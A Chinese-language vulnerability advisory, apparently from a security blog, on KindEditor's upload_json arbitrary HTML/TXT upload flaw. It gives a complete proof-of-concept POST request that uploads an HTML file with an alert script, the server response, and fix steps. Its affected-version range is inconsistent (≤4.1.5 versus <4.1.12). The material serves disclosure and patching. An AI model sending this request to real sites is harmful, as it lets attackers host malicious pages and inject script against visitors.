漏洞描述
漏洞存在于KindEditor编辑器中,允许上传.txt和.html文件,并支持php/asp/jsp/asp.net。具体漏洞版本范围为小于等于KindEditor 4.1.5。上传功能由upload_json.*?dir=file
处理,允许上传包含htm,txt扩展名的文件。
漏洞影响
漏洞影响范围为KindEditor版本小于4.1.12。
漏洞验证
首先查看KindEditor编辑器版本:发送请求:
<code>http://www.xxx.com/kindeditor//kindeditor.js</code>
发送验证请求:
<code>POST /kindeditor/asp/upload_json.asp?dir=file HTTP/1.1 Host: www.xxx.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=---------------------------283422705626536477632563104216 Content-Length: 260 Connection: close Cookie: ASPSESSIONIDQACQQBTT=XXXXXXXXXXXX Upgrade-Insecure-Requests: 1 Pragma: no-cache Cache-Control: no-cache -----------------------------283422705626536477632563104216 Content-Disposition: form-data; name="imgFile"; filename="1.html" Content-Type: application/octet-stream <script>alert('1')</script> -----------------------------283422705626536477632563104216-- </code>
Response数据包:
<code>HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=UTF-8 Vary: Accept-Encoding Server: Microsoft-IIS/10.0 Set-Cookie: ASPSESSIONIDSQBRRCAB=BNLFKMXXXXXXXXM; path=/ X-Powered-By: ASP.NET Date: Thu, 09 Sep 2021 07:33:15 GMT Connection: close Content-Length: 94 {"error":0,"url":"\/kindeditor\/asp\/..\/attached\/file\/20210909\/20210909153396539653.html"} </code>
漏洞修复
- 直接删除
upload_json.*
和file_manager_json.*
- 升级KindEditor到最新版本
参考链接
https://www.anquanke.com/post/id/171422
https://www.cnblogs.com/backlion/p/10421405.html
© 版权声明
THE END
暂无评论内容